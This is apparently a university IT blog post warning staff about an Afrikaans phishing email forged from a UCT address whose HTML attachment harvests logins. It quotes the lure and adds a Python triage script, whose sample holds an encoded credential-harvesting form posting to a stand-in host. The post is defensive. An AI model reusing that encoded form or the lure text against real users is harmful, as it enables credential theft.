PHISHING: “Re: betaling aan jou rekening”

About a year ago a new version of the ABSA Bank phishing email hit the university email server. What was new about this version was that the email was in Afrikaans. Although the Afrikaans was not perfect, with some spelling and grammar mistakes, it could still have fooled many people because of the “familiarity” component.

Stellenbosch University still uses a lot of Afrikaans as its primary official communications medium, and many automated systems like the Financial system use Afrikaans to inform users of payments etc. While there is nothing wrong with this, phishing scammers have latched onto this and are now attempting to fool people into divulging their personal details using Afrikaans in their phishing e-mails.

We were warned early this morning about an email that was originating from UCT with dangerous content, and almost immediately the UCT phishing emails started arriving.

Here is what to look out for:

Mail will arrive from a forged or compromised “UCT address” that will look like this:


From: Anna Huang [mailto:forged_address@myuct.ac.za]
Sent: 19 July 2017 10:53 AM
To: Recipients <forged_address@myuct.ac.za>
Subject: Re: betaling aan jou rekening

Goeiemore,

Vind aangehegte betalingsbewys.

Dankie

Disclaimer – University of Cape Town This e-mail is subject to UCT policies and e-mail disclaimer published on our website at http://www.uct.ac.za/about/policies/emaildisclaimer/ or obtainable from +27 21 650 9111. If this e-mail is not related to the business of UCT, it is sent by the sender in an individual capacity. Please report security incidents or abuse via csirt@uct.ac.za


The disclaimer from the University and the Afrikaans could fool some people if they are not careful.

The dangerous part is actually an attached HTML file (sometimes it might look like a PDF) that will present you with a login page where you will be asked to give your e-mail address and your password to “view this payment”.

The login page will look like this, in this version:

[Image: screenshot of the fake login page, http://blogs.sun.ac.za/it/files/2017/07/phishing.jpg]

The actual server’s address is also hidden by encoding it, so to the untrained eye, nothing will look suspicious. This is a typical phishing scam, but with the “sender” coming from a neighbouring academic institution, and the language being Afrikaans, we need to be even more alert.
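For mail administrators triaging such an attachment, the following added example (not part of the original article) peels common encoding layers off an HTML file and reports which host a password form would submit to. The article does not say which encoding this campaign used, so the JavaScript `unescape()`/`atob()` wrappers and HTML character references handled here are assumptions, as are the function names and the sample.

```python
import base64, binascii, re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Assumed obfuscation layers: JavaScript unescape()/decodeURIComponent()/atob() calls.
JS_WRAPPED = re.compile(r"""(unescape|decodeURIComponent|atob)\(\s*(['"])(.*?)\2\s*\)""", re.S)

def peel(text, depth=5):
    """Return the text plus every payload recovered from nested JS decode calls."""
    layers = [text]
    for func, _, payload in (JS_WRAPPED.findall(text) if depth else []):
        try:
            raw = base64.b64decode(payload, validate=True) if func == "atob" else None
            decoded = raw.decode("utf-8", "replace") if raw is not None else unquote(payload)
        except (binascii.Error, ValueError):
            continue  # not valid base64: leave this wrapper alone
        layers += peel(decoded, depth - 1)
    return layers

class FormFinder(HTMLParser):
    """Collects each <form>'s action and whether it contains a password field."""
    def __init__(self):
        super().__init__()  # convert_charrefs=True also decodes &#104;-style entities
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open = {"action": attrs.get("action") or "", "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open and (attrs.get("type") or "").lower() == "password":
            self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def credential_forms(attachment_html):
    """Hosts that would receive a password typed into the attachment's form."""
    hosts = set()
    for layer in peel(attachment_html):
        finder = FormFinder()
        finder.feed(layer)
        finder.close()
        hosts.update(h for f in finder.forms if f["password"]
                     and (h := urlparse(f["action"]).hostname))
    return sorted(hosts)

# Constructed sample attachment (not the real one): form hidden inside unescape().
SAMPLE = ("<html><body><script>document.write(unescape('%3Cform action=%22https://"
          "collector.example/p%22%3E%3Cinput type=%22password%22%3E%3C/form%3E'))"
          "</script></body></html>")
```

Any host returned that is not one of your own login services is a reason to quarantine the message; forms with a relative action or script-driven submission are outside what this check covers.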

[Article by David Wiles]
